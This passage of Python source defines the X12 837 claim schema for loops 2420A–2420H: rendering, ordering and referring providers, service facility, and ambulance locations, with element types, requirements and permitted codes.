"2", "2"), position=1, codes=[], ), ), Element( "CTP02", Properties( desc="Price Identifier Code", req_sit="N", data_type=("ID", "3", "3"), position=2, codes=[], ), ), Element( "CTP03", Properties( desc="Unit Price", req_sit="N", data_type=("R", "1", "17"), position=3, codes=[], ), ), Element( "CTP04", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=4, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="R", seq="05", ), Element( "CTP05-01", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["F2", "GR", "ME", "ML", "UN"], ), ), Element( "CTP05-02", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=1, codes=[], ), ), Element( "CTP05-03", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=2, codes=[], ), ), Element( "CTP05-04", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=3, codes=[], ), ), Element( "CTP05-05", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "CTP05-06", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=5, codes=[], ), ), Element( "CTP05-07", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=6, codes=[], ), ), Element( "CTP05-08", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CTP05-09", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=8, codes=[], ), ), Element( "CTP05-10", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "CTP05-11", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=10, codes=[], ), ), Element( "CTP05-12", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=11, codes=[], ), ), Element( "CTP05-13", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=12, codes=[], ), ), Element( "CTP05-14", Properties( desc="Exponent", req_sit="N", data_type=("R", "1", "15"), position=13, codes=[], ), ), Element( "CTP05-15", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=14, codes=[], ), ), ), Element( "CTP06", Properties( desc="Price Multiplier Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), Element( "CTP07", Properties( desc="Multiplier", req_sit="N", data_type=("R", "1", "10"), position=7, codes=[], ), ), Element( "CTP08", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=8, codes=[], ), ), Element( "CTP09", Properties( desc="Basis of Unit Price Code", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "CTP10", Properties( desc="Condition Value", req_sit="N", data_type=("AN", "1", "10"), position=10, codes=[], ), ), Element( "CTP11", Properties( desc="Multiple Price Quantity", req_sit="N", data_type=("N0", "1", "2"), position=11, codes=[], ), ), ), Segment( "REF", Properties( desc="Prescription or Compound Drug Association Number", position="4950", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["VY", "XZ"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2420A = Loop( "2420A", Properties( desc="Rendering Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Rendering Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["82"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "PRV", Properties( desc="Rendering Provider Specialty Information", position="5050", repeat="1", req_sit="S", syntax="P0203", ), Element( "PRV01", Properties( desc="Provider Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["PE"], ), ), Element( "PRV02", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["PXC"], ), ), Element( "PRV03", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "PRV04", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Composite( "C035", Properties( desc="Provider Specialty Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Element( "PRV06", Properties( desc="Provider Organization Code", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), ), Segment( "REF", Properties( desc="Rendering Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420B = Loop( "2420B", Properties( desc="Purchased Service Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Purchased Service Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["QB"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Purchased Service Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420C = Loop( "2420C", Properties( desc="Service Facility Location Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Service Facility Location Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["77"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Service Facility Location Address", position="5140", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Service Facility Location City, State, ZIP Code", position="5200", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Service Facility Location Secondary Identification", position="5250", repeat="3", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420D = Loop( "2420D", Properties( desc="Supervising Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Supervising Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DQ"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Supervising Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2", "LU"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420E = Loop( "2420E", Properties( desc="Ordering Provider Name", looptype="", position="5000", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ordering Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DK"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ordering Provider Address", position="5140", repeat="1", req_sit="S", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ordering Provider City, State, ZIP Code", position="5200", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Ordering Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), Segment( "PER", Properties( desc="Ordering Provider Contact Information", position="5300", repeat="1", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["EM", "FX", "TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EM", "EX", "FX", "TE"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=7, codes=["EM", "EX", "FX", "TE"], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2420F = Loop( "2420F", Properties( desc="Referring Provider Name", looptype="", position="5000", repeat="2", req_sit="S", ), Segment( "NM1", Properties( desc="Referring Provider Name", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["DN", "P3"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "REF", Properties( desc="Referring Provider Secondary Identification", position="5250", repeat="20", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G", "G2"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), ) parsed_837_2420G = Loop( "2420G", Properties( desc="Ambulance Pick-up Location", looptype="", position="5310", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Pick-up Location", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PW"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Pick-up Location Address", position="5140", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Pick-up Location City, State, ZIP Code", position="5200", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2420H = Loop( "2420H", Properties( desc="Ambulance Drop-off Location", looptype="", position="5380", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Drop-off Location", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["45"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="S", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), 